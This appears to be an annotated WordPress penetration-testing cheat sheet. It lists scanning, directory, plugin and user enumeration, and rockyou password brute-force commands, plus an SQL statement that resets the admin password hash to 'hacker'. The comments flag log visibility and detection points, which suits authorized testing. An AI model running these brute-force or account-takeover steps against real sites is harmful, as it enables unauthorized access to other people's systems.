
WordPress

Scan


General scan

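# Baseline WPScan run against the target. "$URL" is quoted so an unusual value
# cannot be word-split or glob-expanded into extra arguments.
wpscan --url "$URL"

# Same scan with a WPScan API token (used by WPScan for its vulnerability-
# database lookups). The token is read from an environment variable (name
# chosen here; export it before running) rather than typed on the command
# line, where it would end up in shell history and be visible in `ps` output.
wpscan --url "$URL" --api-token="${WPSCAN_API_TOKEN:?WPSCAN_API_TOKEN is not set}"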

Enumeration


Directory enumeration

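# Directory brute force with gobuster and the dirbuster medium wordlist.
# Note this line targets "$IP" while every other command on the sheet uses
# "$URL"; make sure $IP holds a value in the form gobuster accepts for --url,
# or switch to "$URL" for consistency. Quoted to avoid word splitting.
gobuster dir --url "$IP" --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt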
Enumerate plugins
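# Plugin enumeration with WPScan (-e ap = all plugins, aggressive detection).
# This line prefixes "http://" to $URL while the other commands pass $URL
# as-is; pick one convention, otherwise a $URL that already carries a scheme
# becomes "http://http://...".
wpscan --url "http://$URL" -e ap --plugins-detection aggressive

# Alternative: derive a plugin list from the public WordPress plugin SVN
# index, then check which of those plugins expose a readme.txt on the target.
wget https://plugins.svn.wordpress.org/ -O wp-plugins.html

# Extract the href targets into a sorted, de-duplicated list. The file is
# read directly (no `cat |`), and the two `tr -d` calls are merged into one
# that strips both the quotes and the slashes.
grep -Eo 'href="[a-zA-Z0-9./?=_%:-]*"' wp-plugins.html | sed "s/href=//" | tr -d '"/' | sort -u > wp-plugins.txt

# --hc 404 hides 404 responses, so only plugin directories that answer remain.
wfuzz -c -z file,wp-plugins.txt --hc 404 "$URL/wp-content/plugins/FUZZ/readme.txt"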
User enumeration
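# User enumeration via WPScan.
wpscan --url "$URL" --enumerate u

# User enumeration via the WP REST API users endpoint. `jq -r` prints raw
# strings, which replaces the original quote-stripping sed (written with an
# unusual backslash delimiter). Usernames being returned to an
# unauthenticated caller here is itself an information-disclosure finding.
curl -s "$URL/index.php/wp-json/wp/v2/users" | jq -r '.[].slug'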
Password brute force
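# Password attack with the rockyou wordlist. Every attempt is a login
# request, so this is highly visible in the target's access logs and to any
# login rate-limiting in place.
wpscan --url "$URL" --passwords /usr/share/wordlists/rockyou.txt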

Other


Set the admin password to 'hacker' (SQL)

-- Per the heading above, this overwrites the stored password hash of the
-- 'admin' account with a pre-computed WordPress (phpass-style, $P$ prefix)
-- hash for the password 'hacker'. The table name assumes the default
-- "wp_" table prefix; adjust it if the installation uses another prefix.
-- Any direct change to wp_users.user_pass like this is worth alerting on
-- from the database side, since it bypasses the application's audit trail.
UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';
Login brute force
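# Credential attack: usernames from user.txt (-U) against the rockyou
# wordlist (-P). Same visibility caveat as the password-only run: each
# attempt is a login request.
wpscan --url "$URL" -U user.txt -P /usr/share/wordlists/rockyou.txt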
Search files that contain the version string
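# Find files in the source tree that mention the version string. -F makes
# the pattern literal so the dots are not regex wildcards (an unescaped
# "5.9.2" would also match strings such as "519.2"), and "--" keeps a
# pattern beginning with '-' from being parsed as an option.
grep -RF -- '5.9.2' /workspace/latest/source_code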